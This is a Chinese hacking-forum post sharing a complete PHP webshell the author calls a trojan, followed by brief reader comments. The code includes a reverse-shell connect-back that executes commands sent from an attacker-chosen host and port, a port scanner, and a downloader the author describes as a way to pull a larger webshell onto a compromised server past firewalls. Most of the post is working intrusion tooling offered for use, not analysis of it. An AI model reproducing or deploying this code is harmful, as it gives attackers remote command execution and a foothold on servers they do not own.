文章作者：Inking
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

刚开始接触php,这个也算是我的第一个作品吧.改木马整合了在线端口扫描,端口反弹以及远程文件下载的功能,大部分代码为自己所写,一部分参考网上作品.由于初学,写得比较乱,可能很多地方都可以精简,希望大家多多提意见,请大家不要笑话.

Code Language : PHP

1. <html>
2. <body>
3. <head>
4. <title>PHP Web 综合探测工具 Bata 1.01</title>
5. <style>
6. body{
7.   margin-top=100px;
8.   background:#000000;
9.   color:green;
10. }
11. </style>
12. </head>
13. <?
14. error_reporting(0);
15. set_time_limit(0);
16. $main=$_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
17. $system=strtoupper(substr(PHP_OS, 0, 3));
18. if(PHP_VERSION < '4.1.0') {
19.   $_POST = &$HTTP_POST_VARS;
20.   $_GET = &$HTTP_GET_VARS;
21. }
22. if(isset($_GET['phpinfo'])&&!isset($_POST['host1'])&&!isset($_POST['host2'])&&!isset($_POST['host3'])) phpinfo();
23. if(!isset($_POST['host1'])&&!isset($_POST['host2'])&&!isset($_POST['host3'])){
24. print<<<eof
25. <html>
26. <body>
27. <head>
28. <title>PHP Web 综合探测工具 Bata 1.01</title>
29. <style>
30. body{
31.   margin:0;
32.   padding:0;
33.   background:#000000;
34.   color:green;
35.   margin-left:150px;
36.   margin-right:150px;
37.   margin-top=10px;
38.   FONT-FAMILY: verdana;
39.   FONT-SIZE: 10px;
40. }
41. input{
42.   margin:0px;
43.   padding:0px;
44.   color:green;
45.   border: 1px;
46.   border-bottom-color:#ffffff;
47. }
48. </style>
49. </head>
50. <body><center><h4>PHP Web Detector Bata 1.01</h4>
51.  
52. <table border=1 bordercolorlight=\"303632\" bordercolordark=\"000000\">
53. <tr><td><center><b>端口反弹工具</b></center></td></tr>
54. <tr><td>注意:Windows下的反弹需要PHP支持socket,即去掉php.ini中的extend_socket.dll前面的分号.Linux在非源码编译安装的情况一般都会支持,具体查看<a href=?phpinfo=yes><b><i>phpinfo()</b></i></a></br>使用时先在本地执行'nc -l -p port',然后执行该脚本</td><tr>
55. <tr><td><form method=post action=\"\">
56. Host: <input type=text name=host1 value='127.0.0.1'>
57. Port: <input type=text name=port1 value='1234'>
58. <input type=submit name=submit value=\"反弹连接\"></td></tr></table></p></p><p></p></form>
59.  
60. <table border=1 bordercolorlight=\"303632\" bordercolordark=\"000000\">
61. <tr><td><center><b>端口扫描工具</b></center></td></tr>
62. <tr><td>扫描指定端口时请使用\"21,80\"的格式,扫描一个范围内的端口时请用\"1-100\"的格式.请注意,尽量扫描少一点的端口,如果你是远程扫描,且网络条件不好,请修改fsockopen函数的第三个参数为更大</td><tr>
63. <tr><td><form action=\"\" method=post>
64. Host: <input type=text name=host2 value='127.0.0.1' size=50><p>
65. Port: <input type=text name=port2 value='21,23,25,80,110,135,139,445,1433,3306,3389,43958' size=50>
66. <input type=submit value='开始扫描'></td></tr></table></p></p><p></p></form>
67.  
68. <table border=1 bordercolorlight=\"303632\" bordercolordark=\"000000\">
69. <tr><td><center><b>文件下载工具</b><center></td></tr>
70. <tr><td>在入侵渗透时可能会碰到无法从本地提交大马或者exe文件的情况,这可能是由于内部防火墙做了相关的限定.这个脚本主要使服务器自身从远程url下载指定的文件,并保存在同一目录下,这样可突破大部分防火墙的追杀.注:要完成此项功能,web服务器必须开启allow_url_fopen,请在php.ini中做相关设置.如果你想远程下载你的大马,请将大马的格式改为txt的后再执行.</td><tr>
71. <tr><td><form method=post action=\"\">
72. Remote_file: <input type=text name='host3' value='http://hi.baidu.com/in_king' size=50><p>
73. Local_name: <input type=text name='file3' value='Shell.php' size=50>
74. <input type=submit value='开始下载'></td></tr></table></p></p><p></p></form>
75.  
76. <center>Code By Inking  <a href='http://hi.baidu.com/in_king'>The Entry To My Website</a>  QQ: 165068585<p>Thanks To The Men Who Share The Codes On The Web</center>
77. </body>
78. </html>
79. eof;
80. }
81. elseif(isset($_POST['host1']) && isset($_POST['port1'])){
82.  if(!extension_loaded('sockets')){
83.    if ($system == 'WIN') {
84.      @dl('php_sockets.dll') or die(\"Can't load socket\");
85.    }
86.    else{
87.      @dl('sockets.so') or die(\"Can't load socket\");
88.    }
89.  }
90.  $host1 = $_POST['host1'];
91.  $port1 = $_POST['port1'];
92.  connect();
93.  echo $host1;
94. }
95. elseif(isset($_POST['host2']) && isset($_POST['port2'])){
96.  $port2=$_POST['port2'];
97.  $host2=$_POST['host2'];
98.  portscan();
99. }
100. elseif(isset($_POST['host3']) && isset($_POST['file3'])){
101.  $host3=$_POST['host3'];
102.  $file3=$_POST['file3'];
103.  download();
104. }
105. function connect(){
106.  global $host1,$port1,$system,$main;
107.  if($system==\"WIN\"){
108.  $env=array('path' => 'c:\\windows\\system32');
109.  }
110.  else{
111.  $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
112.  }
113.  $descriptorspec = array(
114.    0 => array(\"pipe\",\"r\"),
115.    1 => array(\"pipe\",\"w\"),
116.    2 => array(\"pipe\",\"w\"),
117.    );
118.  $host1=gethostbyname($host1);
119.  $proto=getprotobyname(\"tcp\");
120.  if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){
121.    die(\"Socket Create Faile\");
122.  }
123.  if(($ret=socket_connect($sock,$host1,$port1))<0){
124.    die(\"Connect Faile\");
125.  }else{
126.    $message=\"----------------------PHP Connect-Back--------------------\n\";
127.    $message.=\"-----------------------Good Luck :)--------------------\n\";
128.    socket_write($sock,$message,strlen($message));
129.    $cwd=str_replace('\\','/',dirname(__FILE__));
130.    while($cmd=socket_read($sock,65535,$proto)){
131.      if(trim(strtolower($cmd))==\"exit\"){
132.        socket_write($sock,\"Bye Bye\n\");
133.        exit;
134.      }
135.      else{
136.        $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
137.        if (is_resource($process)) {
138.          fwrite($pipes[0], $cmd);
139.          fclose($pipes[0]);
140.  
141.          $msg=stream_get_contents($pipes[1]);
142.          socket_write($sock,$msg,strlen($msg));
143.          fclose($pipes[1]);
144.  
145.          $msg=stream_get_contents($pipes[2]);
146.          socket_write($sock,$msg,strlen($msg));
147.          $return_value = proc_close($process);
148.        }
149.      }
150.    }
151.  }
152. }
153. function portscan(){
154.  global $port2,$host2,$main;
155.  if(eregi(',',$port2)||eregi('^[0-9]*$',$port2)){
156.    $port2=explode(',',$port2);
157.    $count=count($port2);
158.    }
159.  elseif(eregi('-',$port2)){
160.    $port2=explode('-',$port2);
161.    $start=$port2[0];
162.    $end=$port2[1];
163.    unset($port2);
164.    $count=$end-$start+1;
165.    $i=$start;
166.    while($i<=$end){
167.      $port2[]=\"$i\";
168.      $i++;
169.    }
170.  }
171.  echo \"<center><table border=1 bordercolorlight=#303632 bordercolordark=#000000><tr><td>\";
172.  for($i=0;$i<$count;$i++){
173.    if(fsockopen($host2,$port2[$i],&$errno, &$errstr,1))
174.      echo '<p>'.'port '.$port2[$i].' is open! '.'</p>';
175.  }
176.  echo \"</td></tr></table></center>\";
177.  echo \"<center><p><a href=$main>返回重新扫描</a></p></center>\";
178. }
179. function download(){
180.  global $host3,$file3,$main;
181.  if(file_exists($file3))
182.    echo \"<center>文件已存在,请重新定义文件名,<a href=$main>点击这里返回</a><center>\";
183.  else{
184.    $content=file_get_contents($host3);
185.    $f=fopen($file3,'w');
186.    $write=fwrite($f,$content);
187.    fclose($f);
188.    if(file_exists($file3))
189.      echo \"<center>文件下载成功, <a href=$file3>点击查看 </a>或者 <a href=$main>返回</a><center>\";
190.  }
191. }
192. ?>
193. </body>
194. </html>

Parsed in 0.103 seconds

题外话:想做一个全面探测web信息的phptool,大家有建议请多给点意见.此外由于自己手拙和为了精简代码,没有对本木马的安全性进行增强.

支持一个
建议增加常用函数检测功能。

这个只要点击第一个功能描述里的phpinfo()这几个斜体字就会显示出php的设置了吧.

我的意思是制作一个探针，看phpinfo比较费时间。

恩，代码写的不错哦，不过有些函数还是换一换吧。像stream_get_contents这个就只有php5以上才支持的，为了通用还是改改的好，呵呵。